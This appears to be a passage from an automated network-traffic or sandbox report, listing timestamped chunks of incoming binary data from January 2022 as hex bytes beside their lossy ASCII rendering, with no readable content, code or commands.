                                                                                              2022-01-28 18:02:09 UTC116INData Raw: 5a d5 ea b1 8a 21 ef ab 43 07 e3 25 1f b8 d8 6b eb 4e ca 4f d4 fd fb 78 8b ab 7f cc 69 e8 c7 3a 2f b8 5b b5 3d 6c 57 65 5e 34 65 b9 c8 be b9 af 7b cc 64 f5 c1 e1 73 e3 6a 01 df 09 a7 1f 8b 94 f1 32 42 48 37 49 83 86 3f ac f5 0e e5 51 dc 83 29 24 65 3d 99 e0 06 1e 78 21 cb 04 8a b4 d0 e0 95 50 59 25 ea 6b 95 31 bc 73 ba ec 50 2d 49 d9 9e 2c 2f 53 a8 4b 10 67 07 97 84 0f e8 5a dd 97 65 d5 03 0d 2d a1 07 91 3e 28 7a 87 dc 4a 08 8d c0 58 21 54 e1 f3 ec 3f 17 fd 67 2c 24 5f d2 de 00 30 a1 14 9d b0 54 99 1e 8c cb e7 b2 cc 80 74 f9 d7 04 66 f2 24 67 03 33 c2 fd 80 4f bf da f4 13 e7 f1 3e 77 1a 9f f2 2a 14 67 95 d8 e6 70 40 a1 9e 16 91 5d 52 fc 32 0d fd 97 e5 07 10 1a 86 7d fe 37 ba 21 31 32 08 d0 a4 3e ea 5a d6 6f 1b 7d 91 54 37 21 b9 68 89 43 db 07 ec c1 2a 2e
                                                                                              Data Ascii: Z!C%kNOxi:/[=lWe^4e{dsj2BH7I?Q)$e=x!PY%k1sP-I,/SKgZe->(zJX!T?g,$_0Ttf$g3O>w*gp@]R2}7!12>Zo}T7!hC*.
                                                                                              2022-01-28 18:02:09 UTC120INData Raw: 91 18 01 b3 b9 9f 13 51 3f 02 8f 5b 74 5d 24 71 8a 68 87 d7 0a 9a 6b 98 e3 a7 b8 4f 45 e6 c9 0c 9c 5d 20 7d 01 26 3b 02 1f 5a b4 81 57 a0 20 ae c1 4b fa 88 7b 74 e0 9a a2 75 0e 4d 70 6c 49 4e 3a d0 d2 60 65 34 9b e2 b9 83 c6 ca 3d df 74 e3 88 97 be 7c 06 7d 70 98 87 c3 e7 c3 43 03 ff 05 0f d0 0a c0 92 30 cc 43 03 9f f0 ad 7d 39 a0 22 54 5d c8 31 b8 58 46 d1 d8 46 db ef 59 e3 a1 77 a1 2a eb 78 10 6c 75 77 81 6e e9 3e 9d 83 2e a4 97 7c 14 07 d9 99 3a 6a 6a 1b 79 c3 ea 80 ea 33 39 be 98 28 22 50 32 53 2c fe f6 52 12 95 d3 7c 99 d5 63 f8 45 cf 3d 13 15 b3 c4 21 21 de f3 e6 2d e4 c1 b1 64 53 e9 46 b5 0d 8a 97 05 fa 02 45 67 af 04 8b a0 94 b4 52 71 16 f1 65 c6 5f ad 44 ed e2 c1 51 b7 e4 47 63 c9 98 07 31 b2 fe 3b 57 7f ff 82 dc b5 a2 e7 d4 91 b4 c6 24 23 c3 de
                                                                                              Data Ascii: Q?[t]$qhkOE] }&;ZW K{tuMplIN:`e4=t|}pC0C}9"T]1XFFYw*xluwn>.|:jjy39("P2S,R|cE=!!-dSFEgRqe_DQGc1;W$#
                                                                                              2022-01-28 18:02:09 UTC124INData Raw: c1 2e 72 5d b0 22 a2 c3 06 87 dd 8f 22 62 56 28 21 de 97 7d 9c 6b 03 3d 12 00 4f b4 97 b2 f8 30 48 76 50 c6 42 e7 cd e3 26 34 77 df c8 27 92 d8 a5 b8 b1 2c 1a c9 5f 04 86 a5 95 d4 fd b6 c9 91 8b 86 75 da 2c 57 79 79 84 c4 4e 22 39 e1 ff ba e1 c9 15 fd 8b 21 ef 29 9b 6f f5 85 df c5 31 d6 8f 4f 2a 13 e9 e0 02 1d f0 a0 24 66 b4 25 99 49 e2 73 7d fd 69 f3 ec 64 b8 d6 f3 44 0c 20 45 52 ca e1 7c 48 25 eb d5 2c ac f3 29 a8 1f 3c 12 66 88 55 2f 4f a6 9c 35 b0 f0 aa 6d 22 f6 05 09 22 ca 86 c8 ba 31 42 de 7f f7 b1 26 a5 96 98 01 3c 1b b6 56 ec 2d 9c 3d a6 7b cc 01 36 e0 8d ac c5 06 8e a9 95 46 98 33 b5 71 61 a0 10 5d 24 59 13 09 52 ac 68 82 d3 29 4b 92 32 3e 27 94 59 d4 6e 51 78 73 e2 d3 87 dd b5 49 43 59 c9 ef 79 c6 8e 1d b2 c6 89 88 5b 17 0d 01 44 70 7a 50 1a bb
                                                                                              Data Ascii: .r]""bV(!}k=O0HvPB&4w',_u,WyyN"9!)o1O*$f%Is}idD ER|H%,)<fU/O5m""1B&<V-={6F3qa]$YRh)K2>'YnQxsICYy[DpzP
                                                                                              2022-01-28 18:02:09 UTC128INData Raw: 3a d2 34 66 21 a4 d2 91 1e 22 c1 3d 71 2b d0 a7 5f 33 85 ea 5b a6 ba ea 55 57 59 a8 0e df 75 f4 a0 01 d3 18 18 4d 4f 7d f7 85 e1 7b d3 2b 94 0e 9b 10 9e 11 6d 1b db fd 02 60 86 82 73 0f e2 4c f3 2b 50 78 1c bd 75 10 15 cf 05 04 26 33 e9 d8 65 3f 96 bf c6 ba 4c af c0 fd 11 97 88 6c aa 8c ce 6d a4 e4 71 16 04 14 95 52 79 f0 1a 43 62 48 00 bb 61 be ca 0e 98 b1 46 ee d6 61 45 6b 05 92 07 86 51 21 31 bb 6a 6f 58 a7 9e f6 d3 73 e5 ce 70 b7 e9 b4 7f 93 2a d4 a0 8f e6 f9 ec ba 04 92 dd 3d d0 7d 23 9e f5 64 ad 97 5d 60 48 23 96 db 24 10 98 cb 40 bc 4f 74 26 5b cc a2 89 3c d6 82 fa 69 6e 6d cb e9 36 cb e7 25 15 0d f2 fc 56 3c de 51 ac 3e 45 91 73 c0 56 0a ba 3d 41 3b 75 3c 43 90 ec 67 f8 f9 81 2d 7a 73 18 b5 41 f7 41 ad 78 f9 b6 34 e2 f7 80 7a 7f b2 62 ae 6e 1e 58
                                                                                              Data Ascii: :4f!"=q+_3[UWYuMO}{+m`sL+Pxu&3e?LlmqRyCbHaFaEkQ!1joXsp*=}#d]`H#$@Ot&[<inm6%V<Q>EsV=A;u<Cg-zsAAx4zbnX
                                                                                              2022-01-28 18:02:09 UTC132INData Raw: bf 7d 6a e4 b7 e0 1a 98 df c1 49 f2 46 76 50 57 bb 9f ed b2 f6 42 19 c1 22 b7 93 82 24 ae 7d ee de 7d d2 76 54 d2 6e 64 c3 48 f8 34 85 d5 fb 43 2d c8 c8 8a 3f 60 bf 19 09 8c 64 26 6c 4c 0e 99 ea e8 34 e5 1d a5 8a f0 43 85 0d 20 33 2f df 67 30 4a 02 03 63 a6 da 75 14 51 7a 97 42 e8 3d 73 3a 0e ed ec fa d7 e0 76 8a b3 26 3a 1d f8 b3 44 1e d3 57 c3 5d 18 3e fb 82 77 02 56 c8 c3 0b 9e e1 cc b9 b5 1d 7f b1 6e a2 ee 38 6b 08 a4 61 c4 85 55 43 94 36 73 49 d3 e0 e1 8e b6 2b 12 1c a4 1e 2c 44 ee 5e 2a 27 3d ec 69 58 24 59 1d 3c c3 52 ab 46 46 0a ae f3 42 ea 32 56 8b a6 1a 19 91 f0 19 6a 0f 19 f1 21 9c 5f 5d 31 d9 de 64 62 d1 43 81 50 44 0b 2c fb 85 0a 9f 98 37 39 d8 c0 bf dd 21 dc 8a 85 e4 a4 31 85 26 9e 51 c3 ce 41 6e 69 da 8f 56 07 23 32 e4 11 76 8f 63 13 0c 51
                                                                                              Data Ascii: }jIFvPWB"$}}vTndH4C-?`d&lL4C 3/g0JcuQzB=s:v&:DW]>wVn8kaUC6sI+,D^*'=iX$Y<RFFB2Vj!_]1dbCPD,79!1&QAniV#2vcQ
                                                                                              2022-01-28 18:02:09 UTC136INData Raw: 2a 8f 4a ce 88 55 67 56 3f a1 a4 0e d4 e8 af 59 9b 46 11 f5 1c 27 37 04 8c 24 56 2b 4b 34 3a 17 c2 3c 8d ad a9 64 b1 41 9f 84 23 2a 73 9c e8 b4 f1 af 7d 11 3a 23 4d a1 7a 7a 42 e0 47 0c f4 c4 50 da 56 d2 96 a5 e2 1a 4f 41 61 3e 10 0b 13 ec 58 2f fd e9 73 cd b6 84 38 ef 32 33 33 52 22 e1 e6 41 62 85 2b 60 be 48 34 08 74 b9 57 a7 b4 c1 b1 a5 bf 22 d4 7b 19 b7 52 cf 06 ed c8 7e 2f 20 7e c9 01 77 2e 24 ec 67 aa cd 1e 99 b7 9d 86 d7 e4 d9 0c 4a c0 9d 4f e6 75 d6 fe 60 84 72 54 2b 46 a5 6a 88 67 7e 9b 05 0f 6c 1d c5 02 7e 72 51 ad 3b ec a3 c3 91 66 6a 83 63 8d 35 0f ea 65 39 75 03 12 59 11 d7 81 4f 43 85 da 5a ab 9c 14 09 ee 7d 43 04 0a 1b 66 a1 03 f9 87 53 1a 95 28 2e c3 3e 77 69 e9 32 21 ef 91 bd 54 4e 3d 61 72 5a e3 c3 54 51 74 f0 2a 15 cf e6 56 bb d3 92 1f
                                                                                              Data Ascii: *JUgV?YF'7$V+K4:<dA#*s}:#MzzBGPVOAa>X/s8233R"Ab+`H4tW"{R~/ ~w.$gJOu`rT+Fjg~l~rQ;fjc5e9uYOCZ}CfS(.>wi2!TN=arZTQt*V
                                                                                              2022-01-28 18:02:09 UTC140INData Raw: 00 b3 c8 39 12 00 8b ab 47 9a ef b4 fd b0 c2 25 ea 26 14 8b e7 c0 aa c2 93 8e f0 b9 59 28 c4 31 dc e0 dd 74 77 3c 03 02 b5 79 f6 33 1a f3 ec 5c 1e 5e c0 8a 6d 83 29 54 dc 44 eb e3 40 83 c1 75 78 7b fb 6f fe 44 db d0 9b ee b1 81 c5 c3 da 2f b1 4f 45 e6 2a 2d ef 90 42 f0 df 21 9e 17 f0 23 95 41 eb e4 46 4d d6 5a af 84 cd 09 8e 2d 7b 57 6f 1e b9 19 45 86 79 49 04 6a 50 ab 1c b0 07 03 7c 4f 1b 6a 8e 15 08 d9 86 bb 09 ae 9b 0a 03 f7 be 35 9d 1a 85 50 f7 30 4d cd 33 66 0a 95 b7 bd fd b3 3a f3 48 a4 d3 17 ca fa 35 9e 8d a7 59 da a7 04 7f 23 cc 81 cc 85 5c d1 2e 6e 16 7a 71 f8 e0 4f 3a ea 5b 1e 49 eb ec 6e 64 aa 89 38 d3 2f 53 5d 4a 1a 99 81 fc 31 4c 77 8f a5 f1 95 a4 60 bc d6 8b eb ba 20 71 1e 22 ac 8a 60 b1 7f 0d c4 01 49 99 fa 02 80 71 f3 72 0d f8 a5 21 4d 84
                                                                                              Data Ascii: 9G%&Y(1tw<y3\^m)TD@ux{oD/OE*-B!#AFMZ-{WoEyIjP|Oj5P0M3f:H5Y#\.nzqO:[Ind8/S]J1Lw` q"`Iqr!M
                                                                                              2022-01-28 18:02:09 UTC145INData Raw: bd 68 c9 f5 c1 cd 35 a2 93 e4 18 96 90 3a 06 67 6d 34 73 3c d3 16 47 26 16 e1 6e ed 9c 95 b1 65 11 4f 47 9a 00 c9 83 ae 2f b7 cd d7 14 a0 e4 34 59 08 06 b1 94 90 10 79 3a 4a 7c ba a3 01 54 0c bf 44 bb 1c 39 65 9b 2a e4 18 31 43 b4 3f 38 cd 78 d3 77 4d 36 f1 63 b0 97 56 5e a0 03 c8 ec 2e 75 6b bd a2 7c aa a1 1c 1d de fa 7b 3a c9 4f eb db 57 ac 95 9c 42 81 ab 5e 17 58 fd 66 8c 8c 3d 55 cf 61 f2 0a be c5 32 cc 03 95 f8 67 58 03 49 38 fc ef 0d b0 f5 5c 23 1e 36 b8 94 34 bb f8 8f 74 26 ab 12 ea 08 f2 6b 3b ef 0b 42 ad 77 89 33 c0 e3 ab 86 be 38 9c 0c 99 b6 bb d0 1a d7 60 8a 6f ec 08 62 d2 d1 21 60 c3 aa 2c d4 15 4a 65 92 0a 9c e6 9e 05 a5 8f 47 e6 e4 1f d9 c6 0d 5f 0a 2b eb 4c 82 87 92 09 e0 3d 17 db db e1 cb 0c ae be f2 f8 7a dc a2 29 ad 4d 4e 2c 44 9f 51 56
                                                                                              Data Ascii: h5:gm4s<G&neOG/4Yy:J|TD9e*1C?8xwM6cV^.uk|{:OWB^Xf=Ua2gXI8\#64t&k;Bw38`ob!`,JeG_+L=z)MN,DQV
                                                                                              2022-01-28 18:02:09 UTC149INData Raw: 90 1a ee 43 bc 8e f8 ca 3b 98 78 f2 36 b1 4f 0d 95 af f7 23 68 4f 92 10 82 d9 d2 1b e2 48 16 35 35 7f 8a 5e 90 02 92 a7 96 5b b9 4e 79 55 fb c9 22 fd 0b 5a 0f a6 2c 0b da c3 1c 75 53 ee 23 25 7f c0 1b 6d 38 f2 2e 17 34 01 5a 06 89 61 24 05 67 d5 d7 e6 a4 bf 4d 13 14 ea ea 63 ee 74 df 0c ea 6b 49 70 ee 95 e2 f6 c0 bd 85 04 85 f0 d2 b0 1d 55 c8 57 8d 20 b9 96 28 0b a9 a3 af 8f 65 e3 7b 73 b6 7a c2 60 ea bb f7 b2 47 53 9a 0b 52 e8 e1 b4 cc a8 a9 a7 b6 b9 3d 69 b7 a3 e8 33 c6 3a 81 e4 88 9a 37 ff d4 57 70 8c 98 ff c6 f8 38 ab d1 06 70 be 2d ff b1 de 7d 6a 62 02 65 fb cc ff 21 2c cf b8 3f 74 52 0d c3 e5 3d 27 10 13 b1 e8 a7 a2 99 9d b5 77 3b de 33 a8 5a 84 66 f9 88 67 01 7a b7 59 79 84 1f 79 58 24 01 86 61 ba 08 7b c5 66 e5 f8 14 3f d6 36 2d 96 85 ba ce 84 8b
                                                                                              Data Ascii: C;x6O#hOH55^[NyU"Z,uS#%m8.4Za$gMctkIpUW (e{sz`GSR=i3:7Wp8p-}jbe!,?tR='w;3ZfgzYyyX$a{f?6-
                                                                                              2022-01-28 18:02:09 UTC153INData Raw: 83 37 5b 29 5f ce 5a 96 38 37 72 80 87 e7 f8 06 fa 27 70 8c 97 3c ad 75 fe d0 9c 74 a5 e0 eb c6 70 87 5b bd a1 19 b3 9e 04 08 26 fd fb 94 e4 0a 4d eb 41 fb 9d 50 86 f4 bf 94 06 b0 29 06 b0 f4 d5 ba b0 2a f7 c0 44 c3 7b 9d 8d a2 ed 8d d0 70 cd 75 9d 85 e4 7e de de e4 71 8a 6d 89 dd 6d 24 b8 46 a6 75 7e 75 49 1b c1 16 87 cb 6b ed 31 cf 66 b3 47 8d 8e 45 8e 5c a8 d6 5f d7 3b e4 9b 5f 38 b8 ad 9c 5d 90 28 13 e6 7f 1e 86 23 a1 e8 38 ba a0 d6 a7 ab 73 45 5b 23 a0 0b 19 c2 a0 1f c9 e9 f0 4c 62 57 8c 46 6c 25 28 de 34 6a 33 8c 40 00 50 02 8d af 41 0f db 0e 3c 56 da 9d 5c c1 d8 82 2a 40 e3 cb 98 09 92 0e 01 44 76 5d a0 26 dc 0c eb aa 12 f4 3b 12 91 2d f0 34 ca c2 a6 e6 43 60 b5 e0 06 80 7f 34 51 bd 31 14 8c 3b e2 b2 31 bb 68 80 cd 3b 0e 9c e7 57 71 9a 92 32 b5 7e
                                                                                              Data Ascii: 7[)_Z87r'p<utp[&MAP)*D{pu~qmm$Fu~uIk1fGE\_;_8](#8sE[#LbWFl%(4j3@PA<V\*@Dv]&;-4C`4Q1;1h;Wq2~
                                                                                              2022-01-28 18:02:09 UTC156INData Raw: d9 9e e9 72 5e cb f2 84 23 d1 79 2b a2 03 68 f8 4b da 03 e8 cb 0c f8 d2 1c e6 4b ae 3b 95 96 4f 20 2e 82 35 77 65 3d e7 35 03 be a2 bb 99 b9 25 a5 1c 2f 19 8d 54 5c eb ce ec ba 36 ec 46 f9 d9 97 63 d1 e0 62 be d0 55 6c e5 a9 1c 3f 24 3a e3 7b 9a 65 9c 6a 6b 8b a7 03 ed 5a d7 27 67 dd ca fd 4b 22 67 37 b5 41 ff 08 9c 02 68 3f e9 bf c2 24 33 5c 1f fb 3d 2c d8 b7 24 20 cd d7 7e ea da f5 89 b1 e9 d3 10 99 9f f4 c4 ec eb b8 21 12 6e fa ac cc 41 c9 01 3a ff c4 da fc 85 59 ca 8a da 28 a8 85 35 4f 0d 72 8e e2 49 93 31 dc 04 ca 54 c3 9c 0a d5 22 ae 77 f8 31 78 c5 3c 16 e9 bb a9 fe 45 e2 b8 05 6f 69 32 8d 01 0e 95 24 39 7f 1f a2 7a 97 46 85 b0 8f 72 09 53 62 ca 3c 28 23 26 c7 08 1e c5 23 1a 08 21 e2 c0 b5 9b e2 4b 4f 7b f2 27 e0 cc b6 fe f1 b6 78 ff 0f 76 83 fa a8
                                                                                              Data Ascii: r^#y+hKK;O .5we=5%/T\6FcbUl?$:{ejkZ'gK"g7Ah?$3\=,$ ~!nA:Y(5OrI1T"w1x<Eoi2$9zFrSb<(#&#!KO{'xv
                                                                                              2022-01-28 18:02:09 UTC160INData Raw: 49 95 fe ad 3f ed af 82 d7 0d 5d ce b6 bc 2e f0 47 80 3e 70 0d e8 90 17 87 54 31 98 94 5b 65 0d 8a 25 95 7a 49 ae 63 9c 82 00 60 89 6d 96 a4 52 dd 33 81 19 7b 76 cd 13 25 e5 4a 32 b6 5a b7 9a 0b 8e bf ba e2 4b 48 8a 52 c3 c5 fc ed 9e 65 c4 bb f3 dd 05 da 08 f1 e7 da fa dc 73 79 e3 72 34 97 64 80 c1 3b 23 89 7f 4c 14 56 31 8f d0 0b 9e eb 72 10 fc e1 20 5e 3b 36 47 1f 3e 83 cb 31 0a f4 26 5e 49 a6 88 b8 71 7b 87 50 cf 57 08 a1 aa 09 8e 4f 3e 9a 84 ac 3d e4 cb 76 8c fc 0b 1b 4c db e3 f2 c0 9c ea 1e e9 32 36 60 4b 42 d6 66 83 22 9e 7e d9 46 89 26 92 34 f2 5b 4f bd fa 58 bb 11 09 9f 91 54 b0 7a 14 77 95 f7 43 a3 97 68 1e 75 1f 44 92 f2 a1 ed 73 31 bf 40 10 be aa 05 98 70 7c 08 62 52 0c 9c 60 a7 1f ab 76 46 ba e4 48 10 7b 94 d6 44 55 3e f5 60 c0 4e 5f 3c d2 6c
                                                                                              Data Ascii: I?].G>pT1[e%zIc`mR3{v%J2ZKHResyr4d;#LV1r ^;6G>1&^Iq{PWO>=vL26`KBf"~F&4[OXTzwChuDs1@p|bR`vFH{DU>`N_<l
                                                                                              2022-01-28 18:02:09 UTC164INData Raw: 0b d8 17 4a 7d 00 3e 7e 43 6e 36 4b 9d 5b ff e9 0f 85 32 d1 a1 a1 93 bf 2a d4 47 07 d2 89 62 d4 64 df 82 a3 e7 a9 af 3a a6 85 4a 0b 7b 87 27 6e e3 b8 9f 0a f4 36 7c 46 87 27 cd 65 5a 4f 88 3a 6f 5f 4c 90 6c 19 fb d7 ee 1f f9 40 34 33 c3 10 be c3 d5 d3 6e 28 ef 53 01 5d dd 22 64 7a 55 eb f1 48 e8 c4 3b 0b ec 6c 13 fc 98 35 60 58 5e 54 f7 2e ac 76 80 40 00 6c e7 36 56 70 e5 95 7d 76 54 e2 c8 63 09 ba a1 60 7d 3b 53 83 a5 12 b5 46 d0 32 5a 11 c8 35 9c ea 83 b1 f8 4b 55 c4 fe 40 7a db 41 fb 61 3c ed 1f af 9f 8b 0e eb c8 68 07 00 b8 4e 01 5b 85 aa 0a e2 96 fb 58 ab 1f 1c 4f 48 5f 42 5f 14 e8 40 06 53 2d cf 9b 9b a6 50 df 6c 22 7c fb 6e a4 11 32 40 07 15 55 39 91 78 f1 9a 39 04 5e 99 2a 5d d1 d7 37 52 09 7e 0e 51 4c bf 8e 48 49 21 54 97 72 c5 5d 9a 0a 26 58 27
                                                                                              Data Ascii: J}>~Cn6K[2*Gbd:J{'n6|F'eZO:o_Ll@43n(S]"dzUH;l5`X^T.v@l6Vp}vTc`};SF2Z5KU@zAa<hN[XOH_B_@S-Pl"|n2@U9x9^*]7R~QLHI!Tr]&X'
                                                                                              2022-01-28 18:02:09 UTC168INData Raw: 7f b1 27 e0 24 59 1d fb 80 d6 e8 b7 6b 8a 0e 97 8d 82 91 59 bd 46 be 58 99 f9 cd 82 e1 32 ae 17 c1 ae 19 55 24 bc e5 68 5c 68 5e 98 af a2 81 22 c3 5e 24 b5 ee 25 21 0a fb 12 16 44 68 b1 7d f9 4f 9b ed 59 44 d3 73 df fa 0e 23 81 3a 0a f9 78 12 ce f8 e7 1f 18 dc 31 14 51 a4 8c 16 ee a7 e5 cd 9a e4 33 2a bd 05 3b 9b bc e1 6d 86 46 5f 2f 30 a1 96 d8 9f 06 93 67 81 a1 42 9c 71 a2 82 bf 14 86 c6 c3 af 84 9e 6d fd 4e b0 47 93 75 de cc d5 e5 1b a9 fb 5d 23 73 9c 3a 61 c6 73 d1 d9 7e 83 0c 59 1d 7c 41 82 2e 01 b4 2f de e2 0d 66 da f2 de 4b f5 ac 6d 31 7c ba e4 09 f1 a7 50 47 99 bc 3e cc eb 70 84 99 82 f1 d3 f8 a4 4d 7f 14 ba 02 f7 8b 03 06 45 1e a7 b1 27 d6 1d fd 72 5f 3b 9d 7d b9 37 1c 0a 64 00 ca 9e 7c 5e 95 ee d9 0f d6 88 8e 45 c3 65 b4 0d 5d 89 a7 85 1f f0 ea
                                                                                              Data Ascii: '$YkYFX2U$h\h^"^$%!Dh}OYDs#:x1Q3*;mF_/0gBqmNGu]#s:as~Y|A./fKm1|PG>pME'r_;}7d|^Ee]
                                                                                              2022-01-28 18:02:09 UTC172INData Raw: 8a 91 fe 16 b9 00 d0 4d 68 b6 6f 2f 7b 91 ec 27 fc 0b a9 0c 8c 1a bf 44 cf 66 e3 ab 23 73 18 12 85 81 cf 3b 9b a8 54 69 af f0 0a 76 91 c4 46 43 b7 fd fd fb 20 ff d5 14 82 37 fe 2d dc 57 35 75 b0 f5 8c 21 49 dc d8 67 5d dc d5 0d 16 72 fe 26 9a 64 17 8e 94 c8 1f 0c 68 d6 e4 62 0f 52 02 ad d8 98 19 9f 65 de 76 6a 88 3d 50 71 39 fe fc 68 f2 18 bd df 89 a9 b9 36 ca e2 ee bc b3 ca 27 28 a5 bd 5e 8e 63 7c 55 cd ee 80 d5 79 c4 18 fc 5b 4c b1 e7 a9 2c ed 06 2b ce a4 7a 27 f4 9e e4 ce 08 0f 04 b5 26 23 f3 15 ee f5 ce 9c 6e 53 e5 05 6b b7 69 94 f6 f2 5a ce 9e 9b e7 cf 65 8b 76 4f 55 d8 82 86 9b ba 66 9b de cf 41 65 5c 9e 14 1a 8c 5e aa c4 82 de b2 76 b2 9f a6 1f 94 03 0d a5 b4 f2 86 32 52 9c 1f dd c0 3c 79 2c 28 2b a3 ad a4 a3 06 cf 1a 9e 72 98 33 83 cf 31 6d c6 1c
                                                                                              Data Ascii: Mho/{'Df#s;TivFC 7-W5u!Ig]r&dhbRevj=Pq9h6'(^c|Uy[L,+z'&#nSkiZevOUfAe\^v2R<y,(+r31m
                                                                                              2022-01-28 18:02:09 UTC177INData Raw: 3c 2e 1f 1a 45 90 4f b5 01 18 6c 57 cf a3 e5 19 50 7c af 50 e1 32 51 98 49 5f 74 a8 df e2 84 3d d3 7d 7f 31 68 b4 34 d5 1a c0 23 db 3d e6 05 c4 26 8b cb 41 fe 69 d3 ce c8 7e 1d 23 c6 bc dc 4d c8 d0 3a 5d 9b b3 e7 54 e8 5e 87 6d 0d dd ff 32 15 9f e2 df 0b 1b 9b 7a da 88 37 c5 cb fe c6 fb a0 fc b4 49 d5 d2 c3 f7 75 45 3a ae c2 d3 58 8d b2 09 dc 6d 20 dc 27 7e ca e3 f4 2b d6 a5 46 43 7f ec 26 a3 9a e2 31 02 64 c1 3c 33 00 c0 8e 58 98 96 9c 77 87 8a 9e 11 5e 6c 64 17 0a e4 b2 ff 26 55 0c 26 ed 99 67 3d b0 5b c6 c1 13 71 60 51 21 0d 53 7d 7d c3 65 e5 f5 74 16 9e 25 28 97 01 28 28 6d ca c5 04 83 60 c4 67 e0 5f a5 b8 e8 aa 53 d5 52 ab 78 89 6f ad 26 53 95 6c 20 3d fd c8 5e f3 62 42 63 09 0c 32 fe b0 70 27 ee bd eb 19 f6 bc 45 9b 25 b3 f4 6e f4 16 2c 4f b8 2b 1e
                                                                                              Data Ascii: <.EOlWP|P2QI_t=}1h4#=&Ai~#M:]T^m2z7IuE:Xm '~+FC&1d<3Xw^ld&U&g=[q`Q!S}}et%(((m`g_SRxo&Sl =^bBc2p'E%n,O+
                                                                                              2022-01-28 18:02:09 UTC181INData Raw: 0a 43 b0 2c 0e da ee 7b ba 8e 72 f8 03 2e 60 24 77 a9 87 7c 67 a5 eb 26 1c 76 7c 3d 1b 52 5c ab 7b 35 f2 42 e2 95 9a 32 96 91 1b 28 db 72 7b 06 76 bc 18 bb 06 bc 0c 05 6c 8a 77 1c 48 26 d8 67 d5 1d 10 2f 34 9e a0 dd 91 50 c6 9a f4 fd a9 a8 a2 9d 60 57 51 e8 bc 23 55 a8 c1 cb fd b0 f5 a6 df 3d 02 1d c1 c7 1d 43 e7 c0 de 3c f3 be fd 36 8c e0 6a e0 73 a3 37 95 d3 20 3f 2d 5d e2 d0 e3 c4 26 0c 62 0b 86 30 17 f5 e2 5a df 24 85 35 5c 09 d8 a9 5b a6 29 8c 36 c1 de f9 8d 85 77 e3 b7 c2 db 83 af 35 da e5 34 b2 2b e8 d8 9c 59 f4 20 db 21 7f b6 5d b1 96 bc 9d 63 58 0f ca 28 3b 96 e5 34 1a 2b 32 f7 15 0e 31 60 2f a0 88 bc b3 4b a1 40 84 dc 1b 6b 34 71 f3 03 73 f3 33 71 19 f2 ec 01 ef 28 29 22 c1 69 64 d4 2d d5 73 68 d2 a2 8f 78 02 4a 12 eb 51 bd da 84 56 57 52 55 21
                                                                                              Data Ascii: C,{r.`$w|g&v|=R\{5B2(r{vlwH&g/4P`WQ#U=C<6js7 ?-]&b0Z$5\[)6w54+Y !]cX(;4+21`/K@k4qs3q()"id-shxJQVWRU!
                                                                                              2022-01-28 18:02:09 UTC185INData Raw: 6e 5d 56 3a f2 d9 56 08 f4 f9 49 cf 89 cd 54 35 09 9e 4d 00 5a 18 45 56 f4 cf 85 56 42 c5 bb 69 64 12 34 2d 5b 35 fe ee d0 9f bc fb 18 71 f6 00 97 c9 cc e9 57 7d 42 17 8b 5b 1b 14 b4 84 02 e6 6d 52 7d c7 9f b8 31 22 f4 a4 57 e1 cc d5 44 fe 12 f5 57 bb 30 e5 33 66 fe 8b f4 de 3d 71 90 2e d6 9a 31 93 9c 9e 9d b6 3d 6d 3e 02 d0 6f 62 ab dd f0 46 91 ad d9 7b 87 16 92 65 15 7b e4 c5 d7 88 7d ea e9 0d e6 a9 22 46 59 08 11 56 b6 5a b9 3b 97 18 ae 62 66 6c 1a 23 bd 3c 2c 63 9a 3e fd 02 6d 8d 0f d6 d7 cc 73 c1 ac b6 7a d5 fd cf 63 4d 4b 00 69 15 f8 6c 6b 71 59 45 72 c4 12 12 63 b6 94 93 1c 21 a9 fd bc 62 da 80 14 66 00 cf 9e 83 8d 8c c2 f6 3f 6a b2 dc 70 81 5f e4 66 b5 25 fc 06 75 f4 78 e4 0b 73 14 7f ae 3a 5b cf a2 ec b8 3f 10 aa ca f6 84 32 6b 3f 96 06 6b f3 3b
                                                                                              Data Ascii: n]V:VIT5MZEVVBid4-[5qW}B[mR}1"WDW03f=q.1=m>obF{e{}"FYVZ;bfl#<,c>mszcMKilkqYErc!bf?jp_f%uxs:[?2k?k;
                                                                                              2022-01-28 18:02:09 UTC188INData Raw: 7d 31 fe 35 fc 6a c8 0e 8f c3 6b cb a9 b4 56 44 be 87 b6 14 51 40 ed 40 ce 0e d7 c7 d4 5f 30 2b 61 e6 2b e8 e8 bd a2 99 d1 50 88 50 6c e0 bb 45 2a e3 2e 32 e4 d6 97 19 10 a4 e3 7a 7d 33 cb 28 d2 31 96 4a ea d6 f3 8f 81 57 a2 0c d8 fe 1e 35 e7 c7 d5 27 b9 70 f1 6d 09 f4 70 15 08 73 55 0a 3d 9e 13 15 11 ac cd b9 33 fa 0d d2 aa d4 ab 0c fb 27 b1 df ec de 71 13 bd f0 8a c7 8d 15 76 83 f8 6d 04 c9 79 3e 5c 30 09 60 fd b7 68 c9 2c 28 14 d8 75 25 18 1c 32 79 a8 6a a9 07 d1 18 fc 89 a3 37 f0 46 6c c3 18 8b 53 b8 c8 29 66 36 d6 52 fb 39 2f 9a cb 3a 63 9a ea 5e 8b cc 8e f9 0b 33 b8 2e b3 8d 92 3b d3 50 86 fc 5d 66 3c 5d 99 e7 14 d7 2a 95 0a de 2b f2 ab 03 d9 ff fd 7b 2f f6 5c d1 e1 94 a2 cd 1e 24 69 c7 04 e5 1a 07 57 c7 83 1b da c4 05 3b 07 7e 83 40 43 98 d4 a1 ae
                                                                                              Data Ascii: }15jkVDQ@@_0+a+PPlE*.2z}3(1JW5'pmpsU=3'qvmy>\0`h,(u%2yj7FlS)f6R9/:c^3.;P]f<]*+{/\$iW;~@C
                                                                                              2022-01-28 18:02:09 UTC192INData Raw: 82 25 80 e4 b2 58 ff 59 4a b5 85 da ba 4e 5d f4 6c 7f 83 cc ff 66 b6 ad 8d 02 9f 56 1f dd ec 57 19 96 54 c9 f4 58 99 71 90 3a 79 b0 9f 78 56 e5 28 ec 4e 3f 95 a0 2b a5 95 1b 95 0f fb 6a 39 8b d2 1b 6f ab 64 83 c5 a2 a4 5f 00 50 72 ec e2 18 1c 1e d7 d1 5c 2b 33 e6 74 46 48 27 c9 e0 1d 16 bd b1 5b 96 d5 2b 53 63 3e 59 3c b4 20 79 7e 27 99 fa b1 56 20 f8 7e 85 48 14 76 fa fe 2e 80 37 bb ae 33 18 69 9e 60 9f 29 5a 1d 0a 8d d0 9f 1d 2b 04 cc 5f 69 1e eb 8c bb d7 bd 6a cf db 86 e7 a3 a6 e3 23 b1 06 dc 27 c6 d6 43 ed 51 98 64 62 d5 94 d4 a1 86 84 ae bc 70 6a 79 3b 